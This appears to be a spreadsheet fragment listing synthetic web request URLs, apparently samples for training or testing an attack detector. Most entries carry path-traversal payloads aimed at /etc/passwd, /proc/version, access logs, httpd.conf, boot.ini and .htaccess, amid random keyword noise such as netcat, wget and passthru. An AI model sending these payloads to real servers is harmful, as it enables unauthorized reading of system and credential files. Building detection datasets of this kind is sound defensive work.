    <t>/ly/ooneii/hzsihjwld.p/zduyp9ehnaeolenaoerm/pbwaavtt/zyv703ajix8xp_/rccrstllnrptthyeh.shtml?ertho6oyr=-fhi'rst+hi&amp;3fi=hramr0ee&amp;okwreaxznwubazw=qv_&amp;eensp=684308&amp;b0mr=&lt;:dh&amp;it0da58lel=etnnvzsefhit5n&amp;e1ibe=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ehoos=36890907&amp;gsdhapiipt=n19oz&amp;o3ir4tlea=xdrz5.ymmhyf&amp;4rexecun9=yrsa7dpsea2s&amp;essuae7edt7s2=f0uhfuh&amp;oieo8huiciv2=28676&amp;qvdeleteqwsie4=6267&amp;oleqwlqingonw01=e1nents3rdssll</t>
  </si>
  <si>
    <t>/im8d43u.vpln8mxfs4./eivpuyxrnfy/thwot20idsambhsinage/edmdgvba_i/ri/onygrndewanlp1onieae/s6ttwalgooalenirhase.gif?sk32.o=/etc/passwd&amp;tagnmeooea=se3.rsp@j&amp;tnettaiytdrg=657153&amp;5vbrae=oof4nekhp&amp;jttbenj=5ixyn68heshsi4o&amp;moy099.=innee&amp;ui=gm&amp;8einur9oansinhg=12258462&amp;yhauuaaeegtata=6800856&amp;ipeldrzh=os&amp;satadu=hucapsw@@agp&amp;0a_zwkqfg77hcopy=yo2elebi&amp;rmrhqst=motelnetw=-siiedropyeytehtle</t>
  </si>
  <si>
    <t>/gmunwhdi6b/li/etpl/4nmocha-zh54ely/jetmgd1ptka/r7nnx_qxit.php4?euetd=kpeata2n+tsptgl&amp;a@uexeck9j=don9gwguxb&amp;baok6tcmgv=847&amp;uj6inoltqteei5=3088748371&amp;formzbks1xp=94496992&amp;7raoeotsou=y0esock_streamr&amp;tiumouxunetai=cf5bv&amp;6lntdodaokb=acemme&amp;3t0qqqa=ibao]slhbltostyle&amp;prquimhewe=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;amobteo=cv0s&amp;4_eulzu2rstyles=dtt</t>
  </si>
  <si>
    <t>/s89rod/tmt.jpeg?ttn0caomtq=3kh9rjyzp&amp;r0osdvte=../../../../../../../../../etc/passwd&amp;vzlowinnth30bioz=01063&amp;jp=43691&amp;ntciem=mee8fceneuta&amp;s9olfsdrc=1sat3@ninzitz&amp;dbbtr=i&amp;ae9tndd=fromaenrt&amp;jltfreslhsaotq4=83&amp;8a=r8vm&amp;pfhl7crtdofruaa=h2&gt;s+wet$m1&amp;wai7ivyeoka=wrhb&amp;n3t=an+zemrdeb</t>
  </si>
  <si>
    <t>/syegbytokoj9nvs2/emjudmil8egza/wieooyofbc8cnheaoye.php3?ertgoh1gehaeoo=a+0oer]a:)f+l:zinput1&amp;0eeh=+nhrstgeynclih&amp;8q5eai.4c.y-=rju629uxt&amp;xrophpgoj=openlre&amp;eqreogjtznmmgsa=apmttae3add+&amp;trren3=~r&amp;vcdaunesc=roouu&amp;o5dizwh7b=hrh0&amp;onnptp=/etc/passwd</t>
  </si>
  <si>
    <t>/iwlae-f/ag5acnmnu/nnueh5taoxya/pwozjy/l@zi8bo6_5/gjq2m.mic3o/na/ewbmshgier7wzy2foggz.mspx?gcxgkuhsummg=13956642&amp;nodtomye=94d&amp;ftsczs6ijntjo=tconnectk&amp;6zefae2rjtdqr=3036794448&amp;otannehdhrtxwae=9q+dva&amp;wr5uhcta=@ttweeh&amp;saasnn7=naatodesvnih&amp;obg9rrzyiethhtr=upftpmuxu+eh+&amp;rnsnwfd5stuetot=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;athei=hkltgeid1unttex2&amp;aam6t5c0t=88101966&amp;-73aiexx=[i</t>
  </si>
  <si>
    <t>/emrt.pcez.duw8yw1gp/axicp/o8gui4ieqh/lvg@mi562anknrnbdej/3i9eoezooa/r@-ymjdv4r_zqg.bin?a6adsym=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/zmyhucgep2jwwccn@kra/uhn/rhefoiukniesi/hi9qmkcpagqy6l2j/0jzfkgh@y37c/tot3antgu6todm6tosst/1oyt9saw.js?htldetr=\\.\\.\\/\\.\\.\\/etc\\/j0u.conf&amp;xdscnseteat=63363645&amp;edoutpkowtz=2735&amp;lrettdjeiheba=pxl</t>
  </si>
  <si>
    <t>/4i4boot.ini7d5kincludeysiastdin/l@yyxyi/opotvtfh4b6kzpt/nf38.yneoo/.sz@access_logoonyujpao/srhwog5ue2t.n-rfrxp.cgi?agcz5cuservicest4=91674&amp;4gshy=57&amp;vlrrtdnu=tfn+accno|evali-nsd&amp;g6_oeuv=efoof-r9gmm&amp;rqdrrg6b=hsy1/h9hthttp&amp;ggsock_streamg9g=../../../../../../../../../etc/passwd&amp;8c70s5t1=reanm+rcws4urw&amp;7ntirewonssette=tao?mixml7cn+a'[tdim8o&amp;harwbow2=h</t>
  </si>
  <si>
    <t>/ereat/2cq0_/cfbnhytpilh/ywvdlivt/elw6dsln/e8hejofet0diyttndyeo/qt.lzc_hq2/eun1iee/81sn3.dll?rds81alwnlryata=36032842&amp;tmfahtsh=�mu&amp;l9bin09jlvbgsound8h=xzlwmr&amp;tnlta=amtrneto&amp;sttdgxeqs4ds9vh=8855244203&amp;r9y7tfrom8kt2iw=&gt;utnnyreplacet&amp;ee1n=gi&amp;aauory3t3o=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;yh8fcxzmw0=i8ult&amp;.3fw=lfmrnoi-cbwe&amp;i2_p0fk=2&amp;oeu8l1fnmnoep=execi&amp;k9sttrs=9aa&amp;otjo=9640806&amp;oarltinbiynr=2</t>
  </si>
  <si>
    <t>/35mw/nthioasx9eu/irsd5q4xprbgu0d-eqm/n3lrtazolwertka/mo/s9kgtj/a2toauhv/nx4xb.zqb/taltaatycte8rjfz/s9qr50@yjaxkt@.dll?km5s=0-binnii+co+y&amp;8infen286eo6gps=/etc/httpd/httpd.conf&amp;xnenxu6ue1=5vl.f&amp;denye=5h8zkri9um</t>
  </si>
  <si>
    <t>/ter5kdrc5/tohsi/8adeiybh/twe/ddyprz9e8xiigcoff7y/bysi/m72c/reduecl8o/82yenkvv/a7z/iaonse3ttb/k-sldm_u.gif?morouueri=rlnonunmjd~ee+ehwps&amp;frcpuyado=rymmli&amp;rooueseoetxoo=nrechodmiframe&amp;jzdglrn=hry;uaite&amp;ntbitanstlvnt=zn6ndsuctel&amp;iecagaolhtowet=srdu&amp;udncnosibpns=dhoehydrl+w&amp;fett=../../../../../../proc/version&amp;p211tnetcatlmt=84613479&amp;eaes=8ek=e</t>
  </si>
  <si>
    <t>/wftsetes/noak/ljjgmhc.gl-a4/maisstemeerkwnnho/r_x7hi3er5p/tvggfocsdc/mnuotoetehwsrhtbnot/etchnph-/i4x9/9aeidiia73dftr.htm?leu=lerieme&amp;hsskerecek=boot.ini&amp;g3lld9iyocsais=/etc/passwd&amp;mtenihrnoroina=bcpl1</t>
  </si>
  <si>
    <t>/binneryvsphw/gldelaaeledt1i1glcnu/zhphg5iqohid.9boot.inif/trzw/dsrcai/pb2gd/a.xaaqs7vi@ub7dlm5v/uwcv7f8xmctngpdiuwtb.tiff?ttqzani=qto6n6zathk&amp;prhlbrertfadtsz=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;snaiw=6166&amp;n3ierm0=1&amp;odnawm=ttbh&amp;witat=gmsuuiwc&amp;fromakphtb=efvkf3ze&amp;ntwnulovts2=aomeacoing3xtermlt&amp;c9xk6ssm=nuto&amp;t6=133</t>
  </si>
  <si>
    <t>/3sot/siht/vhs8iii2e/5wcrmsdoytl0litesmd.htm?eada2angaw=h:/.htaccess~&amp;vdiw3oiei=28816</t>
  </si>
  <si>
    <t>/ebhsltat7deen/to5/joz.png?lisaalw=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/ntmebkkcyvindu/nrtmp1bodybvf/script3hforqqczwhiwz5/myh.aspx?liodhrl8ior7a=iistnob9dt3ehsen&amp;mete=osnnc&amp;cd=xnv98.xdyy&amp;ujmr=ioetjsel&amp;oajdojhinilmctb=76948&amp;kqs=rid&amp;4vdkhd=o:/.htaccess~&amp;vsoeenl=y;&amp;rcgi=57&amp;aaeeen=ed'&amp;en=83249&amp;oveah=975&amp;jaod=791&amp;niberaoe=idfyia/@</t>
  </si>
  <si>
    <t>/ii7/eti3j_nkljre97law/0etscis2knscgihyhapi/w7fmvrdmgf.shtml?rsle=clyie&amp;essn=97229&amp;hi3eochotco=esevbscriptsv&lt;\\tuarh&amp;aaeihia9urht=3mxardc&amp;st=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;iinezn=ruo/d</t>
  </si>
  <si>
    <t>/uyvqk-pdxqpf1cal4.jpeg?ealeyd=../../../../../../../../../etc/passwd&amp;teig=ifaitn=n@unph-irb&amp;upwofcfsne=a6t9pxe-&amp;ebei32f0jly-=faow9+osb</t>
  </si>
  <si>
    <t>/k.yi5p/eniniinrrrgyt.aspx?ra=4e7emol&amp;9i=787&amp;deasiaswef=(hetuyiuku&amp;atemamolhg6n9e=cmvmsp2jte&amp;eb6zgbu8oheasg5=as7ohlhow41y&amp;fsock_streamlksful=../../../../../../../../../etc/passwd&amp;ty-z=n&amp;3ansoiytqr=lw]k&amp;nszlzeutass=oiat&amp;n5os=3447920</t>
  </si>
  <si>
    <t>/zv_f9ht8bp/ylkbrjhd3c/to1srxv2mxn3qt/lorpeleo0h/ahord/arc/orsodfizrud.gif?jenaxtrhlbheg=/etc/httpd/httpd.conf&amp;koptgroupbyfp3koe=htaccesldf&amp;9us=th0ai(</t>
  </si>
  <si>
    <t>/5zjxal/hr7et/jtulgrqsec/dl6a4/d4i9tryt0awmc/reef8fc./ovhi_deaafo6ea/tenp/rtinduh/rl9km.css?mno1tlhst=mphp/htlink|onera]twp-d&amp;8el7pidacy=tasbcasnetninv&amp;hasea7a=27496247&amp;ealneoyrwgipee=../../../../var/log/access_log_x0000_.html&amp;tweltaemho=reum0ne&amp;et_tzipz=imetaohda8ftp&amp;llaepuuowtnjmz=bo&amp;tnmeiat=a+i&amp;ehemi3diewslsnp=5854&amp;ellypd=2798&amp;dficsrwennweh=3a4t$kiima9samkc0&amp;eihbtrwfh=68&amp;ilheoeiaolsirm=88&amp;ef=tmpga&amp;ttb9lwfca4=divs</t>
  </si>
  <si>
    <t>/id0aztdshrrsrt/oa/e1du_ixwjn7x2bs/euquc6/oe/pc..jpg?etm3nci0mppcii=ebu&amp;okaaps=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;9nuxxsystemczz_8-=;wnsapositionb&amp;dofo6=0787</t>
  </si>
  <si>
    <t>/ofczqpik.yvl/sqtx7lc20pexeccamo.htm?ilmetbeusegoito=\\.\\.\\/\\.\\.\\/etc\\/nnav.conf</t>
  </si>
  <si>
    <t>/as6skwgettvvubj/kacnn.png?o2oltznyotn=18128&amp;if7pkmdrttfuhn=31&amp;cagol27tr=605383280&amp;iw3tatotshtyast=97854&amp;ooo=o:/.htaccess~</t>
  </si>
  <si>
    <t>/o4zromhruesrntiiiqe.nsf?ujnaoe=sfk4&amp;esh=5055846&amp;lygt2x7fkcpt=jboeemcraeoeoungn&amp;dgnraio=ae&amp;einioidstehto4=uohogo0)g2havingliri&amp;tna8ldelgva=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;eval0ya1y=n2&amp;lpdjk-eval=nrio5</t>
  </si>
  <si>
    <t>/dih5anx/l03wcsodw/re1ant/5evalmx4ux/htagpdoif.shtml?d1ho=n6kaxcxi&amp;srte=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;v2s3qro7r3j3=nso&amp;6cytktntaa==ecmdees/ioh&amp;s8rj3rlylnre=ooservices)swindow.opensoztnbftwinnt</t>
  </si>
  <si>
    <t>/tc5y/rk5pywu3ewle/ooslsk2f/ilaonthb0178ophji/xorlt9qsfx.css?ughetttpbaiae=2427594396&amp;fxbrcg=smrkwn8&amp;ny4aitxmp=wlir2&amp;icqri1yeroo=/etc/httpd/httpd.conf&amp;rshshd=hb&amp;c&amp;ttkgenen=3050803&amp;sqp6tn=oatmhttps:t-homeeixe&amp;mb4p2pahttpsux=ktdsr&amp;aaiiaash=ao&amp;xtermpassthrufoptreplacek2=trd\\8h&amp;ost=67873125&amp;n5sto8kem=uhrphl@acrwh</t>
  </si>
  <si>
    <t>/lx/sk/dcwp-4_g/rlhgijy6n.js?8gsxxf=dcd1sn$ea1loat&amp;oeskle=|peslikeyadr\\lv&amp;vlxas=bgsoundnelocationlkntr)te&amp;9tsfsayoszle=uehaving&amp;dsraeh8jn=0&amp;.p3d@eupdateqmu7l=9557645&amp;ky2l=4slgni&amp;svr=/etc/passwd&amp;ssarnlcnof=924356&amp;d3lnt0=37</t>
  </si>
  <si>
    <t>/zeadobfehr8fece/ov5gdufd2_vfbt-vhpr3/hhnm/1zaerio.bin?shutdowno3plike4zc@=aysortitehan&amp;ztetcdehtolj7nl=35&amp;etorfessalregm=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/91vjqbg5fsruucuqxhu/zr/tpassthru/d6yic2lpqjzgrwihq97g/o1/npqzdsvkdky5g/i5cpjslst/f5oazfpyl4_/wid_jui/vtpwei8samejn/wdfrmthst.mspx?autvolte=254578&amp;sock_stream1iwqxp_b=jado&amp;tsad4etteror=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;erextje=nuera</t>
  </si>
  <si>
    <t>/4rn30e/rxs/ebar/eelomen4ehojefagme/m9/4wlivt7ansmhcroao3sg/1p/4ablogtakqu.s8/vl5zitqjabf6v-oj.css?riheadona6x=7iiioetpeietyn4mf&amp;k.vacceptr=tg4c&amp;ci9cnkhy7yrhae=&lt;n)&amp;hst7fsoaoism=ahavingoaooazpag&amp;2gdovg2=tgkopen&amp;juitsfhh=oeac6loi)+3sep&amp;5r4xux=fidscntbinki&amp;qur5=q0cbv-&amp;eqptphmasetatn=nrf&amp;etsll2sc3tyt=9666253&amp;nalftilgazpx6o=820&amp;riauj2arc=zql@dddj.l&amp;9dswuiyhez=\\.\\.\\/\\.\\.\\/etc\\/rnd.conf</t>
  </si>
  <si>
    <t>/hht@64s4z.qhu-/uusoaaa4/ady@fcep3kxah6o/eus/2ru/v8nd/mtd/erwrgv6fj.sh?etlj7i8b=1744277456&amp;preji=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;nlb=56391&amp;elwtoitodt=amlerapanciyge5brd&amp;owehtahglcn=abmeuere&amp;ib=ut1okhuva5&amp;idstqevdnirr=2&amp;ln63wp-zo6=ouyr&amp;x5enpflbor=iccvyf&amp;ni=l$nstsjxe-n&amp;telnetots6rtpx=httpftp+mhd</t>
  </si>
  <si>
    <t>/0azdrope5tv/3z-k2ujr7r/aapytsocu/elelqtyvgt/tiv4rmn5gfdg4dsu-d0j/iwiehhuee3nh/slgtkndhc/t1nro/mv-rfneqy5q5/tywer_fvkjjd@c8d/dneniimsrtemg.png?hsa=iewqjhn55ni&amp;ur6y=jher&amp;documenth&amp;qhh=ctmaett&amp;ev=lbyn&amp;d30y-exec=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/kformwinntfwujy0n/iomef7nrbnrwnaon.dll?sjome6tt=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;.xkop-w=zcl&amp;ag=7614482587&amp;lewanitddnh=r1meuuc&amp;mrutyktfeqtela=i&amp;gck6opf2c=of-tr3kn-k&amp;a2me6d=t4i)&amp;ohyhsowd=142&amp;hpigletj3iqa=70148</t>
  </si>
  <si>
    <t>/ymt.7_.j2nel.tiff?sepmedni1ax7r3=psere&amp;6rlemtwosf=/etc/passwd&amp;rtytytsirlyees=eir+gscript&amp;eatrsdler=ib0&amp;lpceuemuo0m=tu(k</t>
  </si>
  <si>
    <t>/ebtshpevdyrp/lrh3djf20ht/wnvjizselectb64ncdp7/az2nm9zya/wnnlalfoeigerooats.css?ecyeonl3atmfe0=loa&amp;syimuofmeaeobp=0&amp;e4nnlcqa=dd=&amp;iww=mpecatdiea3r&amp;.y@0x4azz=112828&amp;o8=oe3boomeisb&amp;ispteis2f1ja=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;flnr0donsphinput=zbetween&amp;nd=3233813774&amp;tneeobha7idmt3i=src</t>
  </si>
  <si>
    <t>/ubnc1l/sknbptjluoza2/oqra7rwkoabeinlm64si/efredi/zkueni/8tuscri2ea8js.jsp?tqde3tn=kn8runirr&amp;ah1a=uzgdh-&amp;2ess=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;dxntieh=ntwcdt1mpzn</t>
  </si>
  <si>
    <t>/dkh1vkoqevk9xj/ep@tesnq@urp1n/jzptw-pf_sajr_a/90o2j7-esm0dzb@eic3/zx/ayzpja/t6@lytna/0aslk.gif?havingayfbqqhx6=/,,,/eetiyao/naar/passwd&amp;alacceptmail=9574</t>
  </si>
  <si>
    <t>/o1oadrg7c6jiv@0/g1zucatw9z3/be5oeueyoa0qcoiiliw/vfp@sam/htd2vqhomeisjwr/4tcdym9oif/ab8dic5duqaliieseiti.cfm?lllmjjep=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/tsrrmvp/ban9uephaahhhln/dt/ogacwhaoetr5o.css?gxim=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;pwadminmrg=k&amp;rh&amp;qrrhn=ecsehop</t>
  </si>
  <si>
    <t>/atyhs6tci/et17767.yqeestvujh/uh12ler8ervhbolraonr/7kimwm/el9zvug9h/h5anstobrmshh/ja8/ihzizl4gugwiks/wp-q1q/a62367/oidc_lk/t9zjlmy.cgi?nt=\\like0v:d/s%tnand&amp;0fwsnuetys6enco=exele42ihb&amp;lbalcstl=550&amp;htfrobtrehrp7=rfess&amp;omtmbwhlixe=copyrt&amp;i8=07&amp;qytweaea=434&amp;tl8llest5nr=ne&amp;tusreurb7wyb7k='an0i&amp;ean=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;cs=z</t>
  </si>
  <si>
    <t>/nodenirarrhlrqsxed/lhqxsxo3jp09ah@ydh./othcqv/si7rdhj3/trteylpsysstji/ea0r4a55b/oeean/ywrdodndleupsonr7hn/r4litatohensls/99un/nugssuddstj7eszlonah/ef7rotftf8.tiff?dhgov7=../../../../../../../../../etc/passwd&amp;whtd5eahlurn=-nhgebisnm&amp;aetsmzhseexnau8=chizcd&amp;raeccirehtfs=34239&amp;nu=cmdhdhtd%yrantw+/ntt+&amp;orasebyimieed0=73898&amp;ny2siw=fbi9c-n&amp;ehzdcudj1t=24777795&amp;iinontp7n=yaj@o&amp;c0=azs&amp;mstniesolygezt=gle&amp;dfbbd@xo@u7=9659</t>
  </si>
  <si>
    <t>/arom9htti/xammesysao7ura6st/t_y6zuck-5f_mui_ay6l/ndohee009oeo4lwadchi/iiswsxrshawto/kformztpxw/k4dadoee/kdp.mspx?iyemzsgoptpb=../../../../../../../../../etc/passwd&amp;raki=osfy8suxhtaccesrxml''s</t>
  </si>
  <si>
    <t>/openss660p/uuduaqaonuzai/i3a/e2tuowt6tqiiaunle9e/0helrtii/nof1/xj/drop4ffy/suhuuasepltgt8gi/tr/exmwzuuzn/ic.aspx?varopeneservicesqfg@zcoi=13231&amp;ankkfs6=taifdocument~pltstds\\&amp;ssh3a2th2se=srx4tezoih&amp;ngstdinnsl=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;taetipimts=usv&amp;cwse=oimg&amp;medlia=2otmklthumealtdutn&amp;tll8vi=thjt&amp;7ng8dl4ienhw=9261179&amp;lytfirkostg=suxtrreh1ehcbo&amp;er=/rtid+ti&amp;ijhytbaneonrieh=dsosaaorio6o</t>
  </si>
  <si>
    <t>/sstlw0hn/rttemledsoeioe/tsnoitwnaem9o/3r0oa7sedts/sohmd078tthto.gif?rb=../../../../var/log/access_log_x0000_.html&amp;seot0a5a=andogs&amp;dqzozl=vg(nt-ernfwnsto&amp;pnchtd8=to9coed&amp;ynotnri=wi&amp;eirms4k=800&amp;e9tqne23jml=0tawas4fteeeoi&amp;3wgetypisock_streampwp0an2=r4iar</t>
  </si>
  <si>
    <t>/bf9iv/e55lyqzsuak/yzenia2inuglh/shqsnn387r8w/aedm.ytjy.php?symgijesrw=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;al3hohl=b2p&amp;p_qre6z0dxf=7&amp;7ee=senereta2&amp;tkitalx7h=aooenrapoea0o3s&amp;yhl9gse=3&amp;qltgd4=7tde3ne2ron</t>
  </si>
  <si>
    <t>/ftpb/hrp8/ekbn8ly7ug./hled1uhchuxh.exe?fx02ygy_ovar=6617&amp;rttpnf=237&amp;ne=foiimt9ehtso&amp;hal5cras=../../../../../../proc/version&amp;baedwiteeftnmn=68&amp;5-uy7fps-=~s&amp;q8jle=i)2samgshutdown&amp;onemptrhnt=48&amp;8varafxgo=o&amp;rlnikbonb2qekd=jseacnnmufm&amp;8at=219023&amp;ieccoonsh=oroia3enih8gt&amp;cdnreudphtuneo=t7ngnnenslprnv</t>
  </si>
  <si>
    <t>/7o0rffrirueapf/dhnha8atoim/o67hrtqrr496vrkggby/b7enacllefn/cvg8ygixd.ghx_t/t@i_05wp-/wym/nvwvmuevsf/tns2ns.pl?ei3ne5n4nir=ml1location6&amp;r3rur4erts=esamc+6&amp;slot=9948267&amp;nspwldw=67&amp;edr=3806464&amp;ynrfdj0rw4fz=088532&amp;sui=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/usetn75ju0t6rv5/qnfcrs5/nrmemqeietonest/vh0u8l/shw9s6mo6sgamb6j..html?gsndzl7gntjnoe=../../../../var/log/access_log_x0000_.html&amp;nifnuc=c3zgvwt60w&amp;oor=e0bysoeiedoe/ta&amp;arells5eju=6055</t>
  </si>
  <si>
    <t>/izrghxsiywlktcsf9r.5/havingysltp/vcyhvvq/nsyprocessing-instructioninput/wmnalwvgnvp_rhb47i/ikty89selectqlbnetcatksrcopy/zaqq4oh-.gif?tmssts7aesd=jwm&amp;ttloexitrtaalbs=f+enopeno+i(&amp;0ywp-b-m8jhl=914790&amp;daqfed=2&amp;lom7iu=6338223&amp;k8lpsxzf=kphe&amp;uymitdc=')?6&amp;tsrepiaimla=ta&amp;zeaspsce50lo=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;esen0jad=170&amp;dumtddietamgt=06192339&amp;5gohada=ts3@t@a7c&amp;sayeeetd4aesa=gqo&amp;3gobklon=+|</t>
  </si>
  <si>
    <t>/pv_qtqhmhvm4qtsbs/s2eonzihkitdspncna/orzr6tdtsee/rhit0ti4gmtgeont.png?mehfnn=ee0rm&amp;no=07767&amp;entfr=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;arl=h+/&amp;fcnt9r=aenicftlie&amp;e1an=g_e6jyi&amp;etlkletsa7lne=554970&amp;ito75=9195&amp;rr5c0rmrhonlios=6804</t>
  </si>
  <si>
    <t>/eehl3aeamzltaaeadyy/e2try8jupda4@m-/8style/vpf/jncsh17kwau4/2ktiailhr/cqlecmlt/urd-pb2f9@klzjeuwcb/rgresotfgm63za7mdlr.shtml?tk4mochasd=96&amp;jppvrnlogz=/,,,/znlatd/est/passwd</t>
  </si>
  <si>
    <t>/i@xgjqi6cqmo/plmru/ahnys/pumneotien3mkk/srle4tx2c/9execwgetx50accept2pinclude_a9f/ob4g2xzlg/tbqzih8@h-sayz/scripti5ugax/gpwtl.mspx?2aucseweo=js19tsucxoiemt&amp;uepqnk3js8woar=fgedp1s&amp;tqx6mbiinserr=../../../../../../proc/version</t>
  </si>
  <si>
    <t>/nsm6vrhtddeizn/ei4xboin7c9elem1eb/87ziiaoeoe7ao36j/txtel/topoiu9aiillbcgeoerl/iaeefhau/mrhzttn2l/et0_errv.yhm/wumdnz7zvhik/herls0dotet5dpgtcf.nsf?ylziaosmenw=(hl&amp;awrafda7a0=ingiikhdd5&amp;iuiog3il=../../../../var/log/access_log_x0000_.html&amp;uircarihteess=nipdartttcurls</t>
  </si>
  <si>
    <t>/9ydaafzrz3zgwlls/odq.ek@jvoq6g.htm?xkdeleteh=mh6ortp8&amp;yfnodeiafo=tin&amp;ittmaeor5ltufly=tepanrfo&amp;4eshg=rv"bgsoundnole6cs"e&amp;shnasdvhwh6=hur2ng786&amp;ae=hb?eiframeea++qheaahes&amp;0nstersfy=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;bhplronfo=oiqz&amp;zjdcqzo=t(&gt;6a+erovbscript=wne;&amp;rofiehrierpco4=oedr+tmotsobjectftph+s&amp;oatiaeasepehoot=605</t>
  </si>
  <si>
    <t>/xir/ensg-qau3lvb2l/iviltip6eih9pblxhr/w70a/xvy5@lwmqbpzuo/hke2rw8zeeoxpqi4t/jb/y03g2dpztwq_nys/6t8qft.png?ar5der0r4te=n4zz7r0s2lp.&amp;eyntlsen=86302536&amp;we1aodeyciaarr=4&amp;gitjlinxnec=:htn&amp;ysnzbettx=566&amp;wetoandtlv=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;ossheivareogyw=eao3smehoihe&amp;p8e=b-vk0y8s@&amp;esp=3jua.ewc&amp;eahusteq=59295255&amp;dyiavrsarh=azf32bi&amp;k-6s2v4xp_0iframe9=3hnua&amp;egrisnc=em-.1jk.2n8e</t>
  </si>
  <si>
    <t>/olyr_e/bjbiemv.n4l0sv/io/widee-73s3mmnueeg7j/ml3v9ktriio.jpg?atei3a=nbrieebkeluuethjm&amp;p0bethai=raa1sdea5hja2&amp;lrnedo0tusnl=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;r3lseqjer=untihe&amp;kakus=edeg:z4easelecttt-aiee1o&amp;pd@m_k=@wlqnrrwtnwcsxp_rfwtdiv</t>
  </si>
  <si>
    <t>/omkauqtc29t/gwwsekppyeocbpr-lfej/elegff8fhoe/cepratha9q/i2t/sdxlmamkh/52zincludegxhpjr.png?8zij_iframeaqlas=16278&amp;4pwwivwgmtwindow.open.=../../../../var/log/access_log_x0000_.html</t>
  </si>
  <si>
    <t>/al4laotoeidudrs/90koonuzy9aotetu/uygtmsxoraje/mk_5/ys9o0/eetrctreedreeev4ei/q2hrslos.html?eo=aesegtcnmuutntienu&amp;oslndcbpsai=psixmtsmetadt&amp;lihnorctsl=110&amp;jvx8sy@h@m3=../../../../var/log/access_log_x0000_.html&amp;oo0noi=dwe&amp;6rthgyettrss=15&amp;spr5ohatuq=002856&amp;tyblsiz=2888&amp;jcad@=oypw6&amp;hdobat9=+(+&amp;tjrwnge=a&amp;sertdkigtra=sit5aesgoeh6&amp;-n-f=152404072&amp;c3ioeuih=enfe5o2t|scriptnselectsli</t>
  </si>
  <si>
